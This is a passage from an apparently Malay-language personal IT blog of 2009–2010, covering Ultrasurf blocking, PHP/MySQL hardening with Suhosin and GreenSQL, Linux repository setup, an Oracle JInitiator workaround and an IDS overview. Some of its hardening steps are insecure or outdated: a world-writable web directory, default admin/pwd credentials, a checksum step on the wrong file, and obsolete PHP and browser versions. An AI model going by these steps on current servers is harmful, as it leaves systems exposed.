5) Solution ke-4 tu baik sekiranya dalam rangkaian tu memang semua pakai SEP11. Tapi kalau dalam rangkaian belum pasti semua PC bersambung tu ada SEP11 maka ianya masih belum fully controlled. Tapi bagi situasi aku tu cuma cara ni sahaja yang sesuai untuk implement dan memudahkan kawalan keseluruhan rangkaian tersebut secara berpusat. Boleh tengok artikel ni memang detail penerangan : How to block Ultrasurf with SEP

6) Bagi yang rasa nak guna SEP11 ni tak semua rangkaian guna anvitirus tersebut dan tak semua AV ada fungsi tersebut. Jadi kawalan kepada PC user tersebut sahaja yang paling sesuai dilaksanakan dan paling terbaik bagi semua jenis masalah. Sebab kebanyakan masalah berpunca dari PC pengguna tu sendiri. Prevent is better dan cure...So software anti-ultrasurf dicipta untuk counter attack bagi halang penggunaan ultrasurf di PC tersebut. Ianya boleh dimuat turun disini : Anti-UltraSurf

Terima kasih pada Zemana yang cipta software ni. Ianya masih dalam beta mode tapi boleh digunakan dan telah diuji. Buat masa ini ianya support untuk versi Windows :

Windows Server/Workstation 2000
Windows XP/2003/Vista

Blog software tersebut : Blog Anti-Ultrasurf

Anti-UltraSurf menggunakan kaedah heuristic analisis untuk kenalpasti dan halang trafik UltraSurf’s tberbanding kaedah hash signatures mcm SEP11 tadi. Anti-UltraSurf boleh blok trafik dari pelbagai versi UltraSurf dengan jaminan tiada kesilapan.

Selain itu, installer software tersebut adalah format .msi yang boleh digunakan bagi rangkaian yang menggunakan domain controller. Yang mana admin leh push install aje software tu kepada semua PC dalam domainnya. (Impian aku nak setup mende ni la kat ofis aku...tapi kekangan ilmu)

7) Ok, kita dah install software tu tadi..kat start menu ada kuor nama software tu..so kalau user PC ada admin mode maka dia boleh uninstall semula la software tu..penat je kita install...so cara terbaik nak kawal semua ni bagi yang tak gunakan domain controller adalah kita perlu setup 2 user berbeza di PC tersebut. user pertama : administrator adalah user dengan mode 'administrator'. User kedua adalah user pengguna PC dengan mode 'user' yang mana beliau terhad :

a) tidak boleh menukar ip PC

b) tidak boleh install software

c) tidak boleh uninstall software

So jika dah setup begitu, masalah ni dah selesai...software OCS yang install sebelum ni pun takdela user pi uninstall semula bila kita dah penat install...ehehehe...

Dengan step tadi maka selesailah solution bagi cara nak block ultrasurf tu. Jika ada cadangan lain leh komen kat artikel aku ni dan bagi cadangan. amat dialukan...

Semoga berjaya!

~ Be a Creator Not a User ~

http://muzzotechspot.blogspot.com

http://muzzoshah.blogspot.com

Microsoft is now ODF enable in their MS Office 2007 SP2 and above version

2010-03-18T00:57:00.000+08:00

Aku bukanla tak suke langsung kt MS Office ni. Aku membesar dan belajar makna penggunaan office automation dari MS Office. Tapi bile aku dah keje ni baru aku tau mahalnya lesen MS Office ni dan MS cukup mengongkong perisiannya sampaikan bila mula beli sesatu perisian, kita akan mula disogok dengan perisian lain tapi janji ada ongkosnya..
Tapi tahun lepas ada satu team open source ni dah start fight untuk jadikan open document format tu sebagai standard global untuk sebarang format office automation. Macam sekarang ni kita biasa dengar kalau file extension .doc je mesti ms words...jadi lepas ni akan ada standard yang perlu dipakai oleh sebarang office automation software bagi memudahkan penggunaan sebarang tools tanpa had pada sesuatu tools sahaja kalau nak edit. Macam bebaru ni kes MS Office create version ms office 2007 yang tetiba je ada lak format docx, xlsx dan pptx...jadinya ianya menyebabkan tools lain tidak dapat menggunakannya kerana ia dipattern hanya boleh edit dalam ms office shj..ampess tui...so sebab tu la team open office nk fight untuk kebenaran dan berjaya..

Dalam format ODF..
1) doc = docx = odt
2) xls = xlsx = ods
3) ppt = pptx = odp

Artikel format extension terbaru dalam MS Office 2007.

Antara lain kejayaan team tu, MS Office perlu boleh buka dan save sebagai ODF v 1.1 tersebut bagi sebarang versi terbarunya...so mulai Sept 2009, MS Office 2007 SP2 dah mula boleh guna. Dan dengarnya versi MS Office ni dah comply terus untuk ODF..akhirnya Microsoft mengalah atas desakan public..kekadang depa ni concur pasaran sampaikan org lain takleh masuk..dan takde bisnes..

Kalau masalah file extension ada 'x' ni Open Office pun dah selesaikan masalah tu dengan membolehkan untuk buka file ada extension 'x' tersebut. Namun untuk save dalam 'x' takde dalam sun OO sebab takde point nk sokong untuk guna extension tu pun. Kalau user nak guna juga leh download bukan versi Sun OO, iaitu versi Oxygen Office for Professional dan GoOO.

OPEN OFFICE RULEZ!!!

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Problem of Unable to Download Youtube Video using Real Player SP

2010-03-15T23:00:00.001+08:00

Kali ni aku nk short update blog ICT aku yang senyap sunyi je ni. Aku bebaru ni update Real Player aku guna Filehippo Update Checker. So detect la version Real Player aku ada versi baru. So aku update la kepada RealSP v1.1. Setakat nak run lagu atau movie to takde masalah, still maintain macam dulu.

Tapi bile aku nak try download je game Final All England 2010 Lee Chong Wei dan Kenichi Tago tu, ok ada kuor ikon download this video, tapi bila klik je kuor mesej dari RealSP kata unable to download....arghh...aku mula tension, hati mula tidak tenang...jari jemariku mula mencari software2 lain yang sekutu dengannnya...tapi hampes takde..masak aku sbb byk perancangan nk amik video dari youtube ni, especially untuk adik amzar yg suke tengok ultraman kt youtube...aiseh tkleh download la pulak...

Dalam aku mencari-cari tu, dapatla jumpe satu link ni ada bincang masalah org post yg sama macam masalah aku ni...ada harapan...

http://www.google.com/support/forum/p/youtube/thread?tid=46ae923d8e624aa5&hl=en

So aku tengok kt forum tu, ada bgtau try test guna RealGold..yg tu versi lama aku..mmg confirm boleh..tapi aku nak maintain versi RealSP 1.1 ni..carik lagik scrol punye scrol...jumpe la komen satu mamat tu..

caranya gini :

1) Copy link youtube tu dan paste dalam browser Real Player SP tu...cthnya : http://www.youtube.com/watch?v=-_Vp3mfpdJQ
2) Pastu video tu akan papar dan run dalam browser RealPlayer SP tu..then ada ikon download this video kuor..klik dan...taraaa....anda boleh download kembali guna toolbar ikon tu..

Tapi dengan cara yang amat pelik sekali...baca punye baca banyak artikel bgtau, youtube dah filter download guna real player ni dan dah blok dah sebab katanya isu copyright..aduyaiii...mcmla video yg dok upload dalam tu macam2 versi pirate pun ada daa...lagipun youtube untuk public view, bukan untuk login user...apa la pelik youtube ni...nyusahkan org sunggoh...

tapi syukur alhamdulillah...akhirnya berjaya gak aku download semua 6 part game final all england 2010 tu yg aku terlepas dek kerana mata ngantok punye pasal...huhu

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

How to secure your Web Server from PHP Vulnerable Attack and SQL Injection

2010-01-11T13:34:00.000+08:00

Hampir seminggu lebih aku try and error dan belajar untuk setup software untuk protect server sistem PHP dan database aku dari sebarang cubaan dari luar untuk hack menggunakan vulnerable pada PHP dan juga vulnerable SQL Injection.

So aku ada jumpe 2 software berkaitan dan ianya hanya boleh digunakan pada server Linux sahaja :
Test Bed aku :
OS : Red Hat 5.3 dan CentOS 5.2
PHP : 5.2.11
Suhosin :
Suhosin adalah sistem kawalan untuk instalasi PHP. Ianya dicipta untuk meleindungi server dan pengguna daripada kelemahan diketahui atau tak diketahui pada aplikasi PHP dan PHP Core. Suhosin ada dua jenis iaitu yang pertama adalam patch kepada PHP core yang akan membuat kawalan peringkat bawah dan melindungi daripada bufferoverflows atau format string vulnerable. Manakala yang kedua pula adalah PHP Extensions yang akan melaksanakan semua jenis perlindungan.

Langkah untuk install Suhosin jenis kedua iaitu semua jenis perlindungan :

1) Import dahulu key bagi pengesahan suhosin yang akan digunakan

#> gpg --import < hardened-php-signature-key.asc
Paparan berikut akan dilihat :

gpg: /root/.gnupg/trustdb.gpg: trust-db erzeugt
gpg: key 0A864AA1: public key "Hardened-PHP Signature Key" imported
gpg: Anzahl insgesamt bearbeiteter Schlüssel: 1
gpg:                              importiert: 1

2) Muat turun extension Suhosin dahulu di website ni.

cd /opt

wget http://download.suhosin.org/suhosin-0.9.29.tgz

3) Kemudian taip berikut untuk semak kesahihan file didownload :
#> md5sum php-5.1.4.tar.bz2
66a806161d4a2d3b5153ebe4cd0f2e1c  php-5.1.4.tar.bz2

4) #> gunzip suhosin-0.9.29.tgz

5) #> tar -xf suhosin-0.9.29.tar

6) #> cd suhosin-0.9.29

7) #> phpize
Configuring for:
PHP Api Version:         20041225
Zend Module Api No:      20060613
Zend Extension Api No:   220060519

(Sekiranya anda tak dapat result seperti di atas, linux anda tiada php-devel package. Cuba run :
#> yum -y install php-devel)

8) #> ./configure

checking for egrep... grep -E
checking for a sed that does not truncate output... /bin/sed
checking for cc... no
checking for gcc... no
configure: error: no acceptable C compiler found in $PATH
See `config.log' for more details.
(Jika keluar result begini maknanya linux anda tiada gcc installed. Biasa la default biasanya tkde dalam tu sebab kita tak guna selalu. so run command berikut : #> yum install gcc)
Kalau repo anda tak jumpa. Cuba ikut langkah nk update repo di artikel aku ni. Kebiasannya default centos atau RHEL dah ada dalam repo mereka.

Sepatutnya akan keluar result berikut :
Sebahagian result di hujung...
**********************************
checking if cc supports -c -o file.o... yes
checking whether the cc linker (/usr/bin/ld) supports shared libraries... yes
checking whether -lc should be explicitly linked in... no
checking dynamic linker characteristics... GNU/Linux ld.so
checking how to hardcode library paths into programs... immediate
checking whether stripping libraries is possible... yes
checking if libtool supports shared libraries... yes
checking whether to build shared libraries... yes
checking whether to build static libraries... no
configure: creating libtool
appending configuration tag "CXX" to libtool
appending configuration tag "F77" to libtool
configure: creating ./config.status
config.status: creating config.h
**********************************

9) #> make
Bahagian hujung result :
**********************************
See any operating system documentation about shared libraries for
more information, such as the ld(1) and ld.so(8) manual pages.
----------------------------------------------------------------------

Build complete.
Don't forget to run 'make test'.
**********************************

10) #> make install
Resultnya :
Installing shared extensions:     /usr/lib/php/modules/

11) #> cd /etc/php.d/

12) #> cp mysql.ini suhosin.ini

13) #> nano suhosin.ini
Delete all words in that file and replace with this :
extension=suhosin.so
******************************
ctrl+x , y

14) #> /etc/init.d/httpd restart

15) #> taip php -v
PHP 5.2.11 (cli) (built: Sep 21 2009 14:49:09)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
    with Suhosin v0.9.29, Copyright (c) 2007, by SektionEins GmbH

16) Tahniah! anda berjaya install Suhosin untuk menyelamatkan PHP Core anda. Cara untuk guna suhosin patch aku tak terangkan sebab aku rasa elok guna suhosin extension sebab ianya full protection pada PHP Core.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Sekarang aku nak terang cara nak install greensql firewall pulak. yeah!
Test Bed aku :
OS : Red Hat 5.3 dan CentOS 5.2
PHP : 5.2.11

MySQL : 5.0.86
GreenSQL FW :
GreenSQL adalah perisian firewall untuk database. Ianya mampu melindungi daripada serangan SQL injections. GreenSQL berfungsi sebagai proxy dan menyokong MySQL. Ianya menggunakan kaedah penetapan markah berdasarkan command admin yang biasa digunakan (DROP, CREATE, etc).

1) #> cd /opt

2) Download file mengikut distro Linux anda. Boleh cari file RPM mengikut distro dan versi terkini di website berikut : http://www.greensql.net/download

(untuk versi RHEL 5)
http://www.greensql.net/download/get?os=RHEL_5&platform=i386&filename=greensql-fw-1.2.1-12.1.i386.rpm
(untuk versi CentOS 5)
http://www.greensql.net/download/get?os=CentOS_5&platform=i386&filename=greensql-fw-1.2.1-12.1.i386.rpm

(* download dan transfer semula ke server folder /opt guna winscp. Puas aku cari link yang direct ke file rpm tapi tak jumpa. Guna wget tak dapat file rpm sebenar)

3) #> rpm -ihv greensql-fw-X.X.X.rpm
*********************************************


warning: greensql-fw-1.2.1-12.1.i386.rpm: Header V3 DSA signature: NOKEY, key ID 1674ae8b
Preparing...                ########################################### [100%]
   1:greensql-fw            ########################################### [100%]

run /usr/sbin/greensql-config for setting up configuration

**********************************************

4)#> /usr/sbin/greensql-config

***************************************************************

executing /usr/bin/greensql-create-db.sh
which: no psql in (/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin)

mysql binary file located: /usr/bin/mysql
mysqladmin binary file located: /usr/bin/mysqladmin

Database type (mysql or pgsql) [mysql]: [ENTER]
MySQL server address [127.0.0.1]:

[ENTER]
MySQL port number [3306]: [ENTER]
MySQL admin user [root]: [ENTER]
MySQL admin password [pwd]: [PASSWORD MYSQL ROOT]
GreenSQL config db name [greendb]: [ENTER]
GreenSQL DB user name [green]: [ENTER]

GreenSQL DB user password [pwd]: [PASSWORD CADANGAN USER GREEN, DEFAULT PWD]
Would you like to set up the database and tables automatically [Y/n]: y
y
Creating MySQL database...
Adding MySQL user green...
Creating MySQL tables...
Modifing /etc/greensql/greensql.conf...
***************************************************************

5) #> /etc/init.d/greensql-fw start

6) #> cd /var/www/html

7)#> ln -s /usr/share/greensql-fw/ greensql

8)#> cd /var/www/html/greensql

9)#> chmod 0777 templates_c
(sekarang anda boleh layari di http://yourdomain/greensql)

 
gunakan user : admin dan password : pwd

10) Kemudian anda perlu buat pengujian sama ada port 3305 boleh digunakan untuk proxy mysql.
mysql -h 127.0.0.1 -P 3305 -u root -p
password :

******************************************************

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6332
Server version: 5.0.86 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

******************************************************

11) Di dalam konfigurasi sambungan database di dalam coding PHP anda kena ubah daripada

$link = mysql_connect('localhost', 'mysql_user', 'mysql_password');

KEPADA

$link = mysql_connect('127.0.0.1:3305', 'mysql_user', 'mysql_password');

12) Anda selesai setup greensql dan melindungi server anda dari sql injection serta boleh memantaunya. Cuma greensql tak capture ip penyerang tersebut. Yang ini kelemahan yang ada. Namun perisian ni amat membantu...

Semoga nota ini membantu anda semua..

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

SPEKS problem with Oracle JInitiator on Mozilla Firefox and IE8

2009-12-30T16:30:00.002+08:00

Hari ni memang kerja aku update ilmu je la...huhu. Takpe seronok tolong orang..So pagi tadi JT aku ada call tanya pasal problem running SPEKS untuk Mozilla Firefox even version 3.5.6 pun. Aku terkejut gak sebab sebelum ni memang oracle JInitator memang tak support dan nampak takde hasrat pun nak support untuk IE 8 tapi Mozilla Firefox adalah solutionnya untuk running SPEKS. Aku tak sangka rupenye Windows XP SP3 ada kesan yang mendalam dan menyusahkan kepada pengguna SPEKS ni. Tak pasti samada masalah ni memang sah dan berlaku kat semua user Windows SP3. Untuk browser IE ni cuma versi 7 sahaja maksimum yang boleh guna SPEKS padanya. Aku ada call JT Rompin tanya masalah pernah hadapi disana. Katanya PC guna SPEKS kebiasannya guna Windows SP2. Aku rasa kalau update SP3 memang dah kena guna IE8 rasanya ia default dalam tu. Problemnya sebenarnya versi JVM dalam oracle JI tu je yang tak support untuk IE baru ni.

So hasil googelan aku, berikut solution kepada masalah akses SPEKS pada PC guna Mozilla Firefox dan
Internet Explorer 8 :
--------------------------------------------
Test Bed PC Aku :
OS : Windows XP SP3
IE : VERSI 8
Firefox : VERSI 3.5.6
--------------------------------------------
1) Check PC tu sama ada dah install Oracle JI ke belum. Biasanya kalau SPEKS kat pahang ni guna Oracle JI 1.3.1.26 sebab di server dah install versi tu. So takleh nk up to date gak..
2) Kalau nak bersih, kita uninstall dulu Oracle JI tu dan kemudian install semula Oracle JI 1.3.26
3) Download JRE 1.5.22. Leh download dari website ni. Klik untuk download bagi Java Runtime Environment (JRE) 5.0 Update 22. Site lain untuk download nanti aku kemaskini semula artikel ni. Bagi staff ofis aku download dari ftp://storageuptm.pahangnet/TECH TOOLS/BROWSER/
4) Install software tu sampai siap
5) Seterusnya buka folder C:\Program Files\Java\jre1.5.0_22\bin\client dan copy file jvm.dll (versi 5.0.220.3)
6) Seterusnya buka folder C:\Program Files\Oracle\JInitiator 1.3.1.26\bin\hotspot dan rename file jvm.dll kepada jvm.dll~
7) Paste file yang copy tadi ke dalam folder tersebut
8) Buka Firefox dan taip http://speks.pahang.gov.my InsyaAllah berjaya.
9) Lepas aku secara tak sengaja tertest IE 8. ek eh..boleh le pulak...amin...ehhee..

Kalau cara di atas ni tak berjaya di tempat anda, cuba gunakan IE Standalone versi 7. Boleh download di website ni. Mula-mula unsinstall Oracle JI dan install semula Oracle JI 1.3.1.26. Seterusnya install IE Standalone versi 7 ni. Follow step sama macam atas dan test menggunakan IE 7. InsyaAllah ok.

Kalau tak berjaya juga guna IE 6 ikut step sama bagi IE 7. Download dari website ni.

Tambahan :

--------------------------------------------
Test Bed PC Aku :
OS : Windows VISTA Home Premium SP2
IE : VERSI 8
Firefox : VERSI 3.5.6
--------------------------------------------
Aku gunakan kaedah sama seperti test bed aku atas Windows XP. Ya! SPEKS boleh dibuka di IE 8 dan Mozilla Firefox. Cuma ada keluar popup mengatakan file-file berikut :
a) ffisamp.dll
b) jacob.dll
c) JNIsharedstubs.dll
d) d2kwut60.dll
tak boleh dicopy ke dalam folder C:\Program Files\Oracle\JInitiator 1.3.1.26\bin sebab masalah file permission. Jadi skang ni download file-file tu dan copy manual ke dalam path tersebut. Tapi bile aku test semula macam sama je keluar gak pop up mesej tu. Mungkin file DLL di copy tu kena register dulu. Dah test try register guna command "regsvr32 jacob.dll" tapi keluar error tak boleh register...yang tu aku tak sempat nk explore lebih lagi.

Aku tak test sama ada dengan ignore je error pop up mesej tu SPEKS berjalan lancar. Yang ni kena tanya JT la..sebab mereka lagi dekat dengan user..

Yay! Windows Vista dan XP boleh guna...dan aku rasa guna Linux pun ok ni..tu blom cuba lagi..letih dah aku mencuba..korang lak cuba..hehe..

SELAMAT BERJAYA!

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

How to Update Repository site on CentOS 5

2009-12-30T09:33:00.001+08:00

Ok untuk openSUSE aku dah terangkan kaedah nak update repository tersebut. Skang ni aku nak terang cara setup repository rpmforge sebagai tambahan dalam Centos 5. Untuk makluman, default installation centos dah ada Centos-Base Repo dah dalam tu dengan refer kepada site2 repository centos. Skang ni kita nak tambah untuk refer dari rpmforge yang ada lagi banyak update patch dan komuniti yang memang established sekian lama membantu komuniti linux berkongsi patch dan update.

Langkah-langkahnya :

1) Buka putty dan ssh ke server CentOS tersebut. run command berikut : yum install yum-priorities

2) Pastikan yum-priorities enable dengan edit file /etc/yum/pluginconf.d/priorities.conf , seterusnya pastikan line berikut ada dalam file tersebut :

[main]
enabled=1

3) Edit file .repo files in /etc/yum.repos.d/ dan tetapkan priorities dengan menambah line berikut :

priority=N

N adalah integer dari 1-99

Setting berikut juga boleh ditetapkan ikut jenis repository dan ianya lebih kemas :

[base], [addons], [updates], [extras] ... priority=1 
[centosplus],[contrib] ... priority=2
Third Party Repos seperti rpmforge ... priority=N  (N adalah > 10 dan berdasarkan penetapan anda)

4) Sekarang kita baru install repository rpmforge : taip cd /opt/
5) UntukSeterusnya taip :
wget http://apt.sw.be/redhat/el5/en/i386/RPMS.dag/rpmforge-release-0.3.6-1.el5.rf.i386.rpm (32 bit OS)
wget http://apt.sw.be/redhat/el5/en/x86_64/RPMS.dag/rpmforge-release-0.3.6-1.el5.rf.x86_64.rpm (64 bit OS)
6) Seterusnya taip berikut untuk install DAG's GPG Key :

rpm --import http://dag.wieers.com/rpm/packages/RPM-GPG-KEY.dag.txt

7) Kemudian taip berikut untuk sahkan file yang didownload tadi :

rpm -K rpmforge-release-0.3.6-1.el5.rf.*.rpm

8) Seterusnya install RPM tersebut :

rpm -i rpmforge-release-0.3.6-1.el5.rf.*.rpm

9) Selesai dah install, untuk uji taip command berikut dan akan keluar result software yang perlu update :

yum check-update

10) Nak uji lagi, try install mplayer :

yum install mplayer

Kalau keluar installation package dia download dan kemudian minta install software tu maka anda dah berjaya tambah repo rpmforge dalam centOS 5

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

How to Update Repository site on openSUSE 10.2

2009-12-29T15:39:00.001+08:00

Aku ada terangkan cara nak buat dalam artikel aku sebelum ni. So cara-cara untuk update bagi versi 10.2 tu sama je stepnya. Interface sama skrin biru, cuma ada menu2 baru je dalam tu. Basically menu untuk update repository adalah sama.

Info bertukar :

1) Step ke 4 tukar kepada Pilih Software > Installation Source

2) Step 5 maksudnya sama cuma antaramukanya sahaja berbeza, dah pilih Add, kena pilih format HTTP/FTP dan seterusnya kemaskini dan kemudian pilih Next.

3) Info repository site adalah berlainan iaitu :

Server Name :suse.inode.at
Directory On Server : /pub/update/10.2/

Server Name : ftp.univie.ac.at
Directory On Server : /systems/linux/suse/update/10.2/

Server Name : ftp.uni-kl.de
Directory On Server : /pub/linux/suse/update/10.2/

Lelain semuanya sama je...so selamat mencuba...

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

How to install Repository Site on OpenSUSE 9.3

2009-12-29T14:20:00.002+08:00

Kali ni aku akan ceritakan cara nak install dan update repository under openSUSE versi lama. Aku explore mende ni selepas di pejabat aku masih ada server guna versi openSUSE 9.3 ni. Ikutkan sekarang ni dah versi openSUSE 11.3 dah...bapokle jauhnya tertinggei..

Langkah-langkahnya :

1) Login SSH ke server guna putty
2) Taip : yast2
3) Skrin berikut akan keluar

4) (Gunakan key anak panah kiri dan kanan untuk gerakkan ke menu pilihan) Pilih Software > Change Source of Installation, skrin berikut akan terpapar.

5) Tekan Alt+A untuk tambah repository dan pilih HTTP seperti skrin berikut

6) Skrin berikut akan terpapar dan isikan maklumat berikut :

Server Name : ftp.gwdg.de
Directory On Server : /pub/linux/misc/suser-scorot/suse93/

--------------------------------------

Kemudian tekan Alt+ O untuk simpan
Ulang langkah sama bagi repository berikut :

Server Name : ftp.gwdg.de
Directory On Server : /pub/linux/misc/suser-guru/rpm/9.3/

Server Name : ftp.gwdg.de
Directory On Server : /pub/linux/misc/suser-guru/rpm/10.0/

Server Name : ftp.gwdg.de
Directory On Server : /pub/linux/misc/suser-scorot/suse100/

** Kadang-kadang ada patch versi openSUSE 10.0 boleh digunakan dalam versi openSUSE 9.3

7) Setelah selesai 4 repository site dimasukkan, taip Alt+F

8) Kemudian (Gunakan key anak panah kiri dan kanan untuk gerakkan ke menu pilihan) Pilih Software > System Update, skrin berikut akan terpapar.

9) Tekan Alt+N / Alt+A (biasa untuk 10.2 Alt+A) untuk teruskan dengan update system patch. Ikut arahan seterusnya dan anda selesai install repository site dan kemaskini patch di server anda.

10) Untuk update sesetengah software, taipkan yast2 update

Selamat mencuba!

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Different between HIDS and NIDS

2009-11-18T20:30:00.005+08:00

Aku akan share serba sedikit tentang apa yang dapat dari kursus security aku disini. So mula dengan perbezaan 2 jenis IDS ni dulu la. Sebab aku baru belajar tadi.

Intrusion Detection System (IDS) ni ada 2 jenis iaitu :
1) Host IDS
2) Network IDS

Host IDS (HIDS)

HIDS ni biasanya perlu diinstall pada satu-satu pc atau server yang ingin dilindungi
Ianya berfungsi untuk memantau aktiviti PC/Server dan detect sebarang DoS/DDoS attack, port scan, keylogger dan cubaan nak crack PC
Ia juga turut memantau aktiviti malicious yang dikenal pasti dari luar ke dalam PC dan dari PC ke luar dan dari dalam ke dalam PC tersebut sendiri
Namun ianya hanya akan berfungsi untuk mengawal sebarang cubaan dari luar atau peer yang cuba melakukan aktiviti malicious kepada PC/Server tersebut sahaja. Maksudnya kita ada PC A (Attacker), PC B (Client-HIDS), PC C (Client). So PC A cuba attack PC B yang ada HIDS jadi HIDS PC tu cuma akan detect sebarang serangan kepada PC tersebut sahaja. Jika PC A serang PC C, maka PC (B) tak akan tahu. Itu antara kelemahan HIDS kerana ianya hanya berfungsi untuk mengawal machine/host sahaja dan bukan seluruh network
HIDS tu boleh membuat scanning pada objek2 tertentu dalam PC tersebut dan menyediakan objek-database dan checksum-database bagi memastikan integriti proses yang dijalankan objek dipercayai dari sumber yang sah
Kadangkala worm dan virus akan cuba untuk diasble antivirus apabila cubaan untuk kawal PC tersebut, jadi HIDS akan kenalpasti aktiviti tersebut berdasarkan objek-database yang ada dan pastikan aktiviti tersebut dihalang.
Contoh tools yang boleh digunakan sebagai HIDS :

1) Snort : GPL dan Free :
- Tiada GUI untuk kawal dan buat konfigurasi kepada HIDS tersebut
- Menggunakan kaedah command line interface dan menjurus kepada text base report
- Memerlukan pengetahuan lebih dalam linux dan command line untuk laksanakannya
- Log paparan mungkin perlukan pengetahuan difahami
- Alert perlu sentiasa dibuat secara manual kepada pemantauan aktiviti menggunakan log

2) KFSensor : Trial dan License :
- Ada GUI yang kemas dan mempunyai database pattern serangan yang boleh diupdate dari internet
- Ada sensor yang mengeluarkan bunyi apabila mengesan sebarang cubaan attack dari luar kepada PC/Server tersebut namun bunyinye mungkin agak perlahan untuk didengar jika menggunakan speaker PC/Server tersebut.
- Mempunyai wizard konfigurasi yang lebih mudah dan tidak memerlukan pengetahuan yang tinggi untuk melaksanakannya

3) BlackIce (Discontinued support tapi still available to use)
- Dulunya free dan setelah diambil alih oleh IBM ianya ditukar nama dari blackice defender kepada blackice protection
- Ianya telah dicontinued pada 29 September 2008 dan tiada support dah tool ni.
- Ianya ada banyak features yang menarik. Tapi aku tak sempat explore lagi tools ni.
- Ada GUI untuk memudahkan kawalan dan pemantauan

4) Symantec Endpoint Protection : License
- Antara muka yang kemas
- Mempunyai database IDS yang boleh dikemaskini dari internet/parent server
- Pattern update on IDS boleh dikawal oleh satu server management dan sentiasa dipantau untuk pastikan sentiasa up to date
- Konfigurasi juga boleh dikawal oleh server management dan tidak memerlukan sebarang tindakan konfigurasi dari client
- Lebih sesuai untuk pelaksanaan big agensi
- Alert akan dipapar secara pop up message alert kepada client dan turut boleh di disable jika tidak diperlukan.

5) OSSEC - Open source Host-Based Intrusion Detection System. Website

Network IDS (NIDS)

Sama fungsi untuk kenalpasti serangan malicious juga seperti HIDS tetapi NIDS adalah pada level network
Ianya bertindak sebagai sniffer di dalam network berkenaan dan sekiranya dijadikan atau diinstall di gateway kepada external interface maka ia akan memantau keseluruhan rangkaian tersebut
IDS kebiasannya diletakkan pada switch diantara local network dan Firewall & di switch Server sistem aplikasi dalaman dan DMZ. Ini kerana ianya akan mengesan sebarang cubaan serangan dari luar internet ke rangkaian dalaman agensi. Selain itu, IDS juga dapat kesan sebarang aktiviti/cubaan untuk menyerang server sistem aplikasi dalaman dan DMZ.
NIDS ini mampu berfungsi secara 1 device kepada banyak client untuk pengesanan sebarang aktiviti hackers berbanding HIDS yang hanya menumpukan kepada host yang dibuat instalasi tersebut sahaja.
Contoh tools yang digunakan sebagai NIDS :

Snort - Teknologi open source

Secara asasnya IDS turut terdedah kepadateori berikut :

True Positive- serangan yang di trigger oleh IDS untuk menghasilkan alarm
False Positive- Alarm dihasilkan tetapi tiada serangan pun
False Negative- Kegagalan IDS untuk kesan sebarang serangan
True Negative- Tiada serangan, tiada alarm dihasilkan

Namun sekarang, kita lebih diwar-warkan dengan teknologi lebih maju iaitu dipanggil Intrusion Prevention System (IPS) yang mana ianya lebih tepat dan dapat menghalang sebarang bentuk serangan yang dijangka dan tidak dijangka akan berlaku pada rangkaian kita.

Pada pendapat aku, IDS sesuai untuk rangkaian dalaman. IPS elok letak di antara Firewall dan Router dan switch DMZ. Kerana kawasan tersebut lebih berisiko tinggi untuk diserang. Lagipun kos IDS lebih murah berbanding IPS.

Selamat Mencuba!

~ Be a Creator Not a User ~http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

How to setup 3G on Huawei E160e

2009-11-17T18:50:00.008+08:00

Lama sangat aku menyepi tak menulis. Antara faktor utama adalah kemalasan dan kesibukan tugas pada masa sekarang. So kali ni aku akan share cara nak setup 3G Celcom pada modem Huawei E160e. Aku baru sahaja beli modem baru dan daftar Celcom 3G pakej D68 dengan 384kbps maksimum download speed dan 5GB maximum download data dan selepas tu celcom akan reshape bandwidth jadi kecik. Gambar modem yang aku guna tu seperti di atas.

Modem yang aku guna adalah model unlock SIM yang mana boleh masuk mana-mana SIM Card telcos di Malaysia selain Celcom. Harganya RM300++ tapi kalau beli kat mana lowyatt atau second hand rasanya lagi murah ni. Modem ni menggunakan software Mobile Partner.

Langkah-langkah bagi setup 3G adalah seperti berikut :

1. Pertama sekali rujuk bagaimana instalasi software Mobile Partner dan driver seperti manual yang terdapat dalam kotak yang anda beli. Tapi kebiasannya windows akan auto detect instalation software dan driver tersebut.

2. Bila dah selesai bab install langkah 1 tadi, akan ada shortcut mobile connect di desktop. Double click dan buka Mobile Connect tersebut

3. Jika ia minta PIN, masukkan 1234 (default SIM Card PIN). Jika tiada teruskan je ke langkah seterusnya

4. Pergi ke Tools, dan pilih Options dan pilih Profile Management seterusnya pilih New

5. Sila taip maklumat seperti gambar di bawah. (Khas untuk pelanggan celcom sahaja)

6. Untuk bahagian Advanced tu tak perlu sentuh. Tapi jika nak tukar dns standard diberi celcom kepada OpenDNS yang lebih stabil, boleh tukar dns kepada berikut :
Primary DNS : 208.67.222.222
Secondary DNS : 208.67.220.220

7) Seterusnya klik Save.

8) Klik Connection pada menu Mobile Partner dan cuba connect. Alhamdulillah anda berjaya.

-----------------------------------

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

My Blog Hits 1000 Readers

2009-10-13T22:31:00.004+08:00

Wow! tak sangka lak aku blog aku ni dah cecah 1000 orang pembaca. Terima kasih kepada semua pembaca di internet dan yang setia membaca teruskan melanggan RSS. InsyaAllah aku akan cuba untuk post artikel lebih kerap lagi pada masa akan datang..

Jika ada masalah ICT apa-apa boleh tinggalkan komen dalam artikel aku dan aku akan cuba respon semampu pengetahuan aku...

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

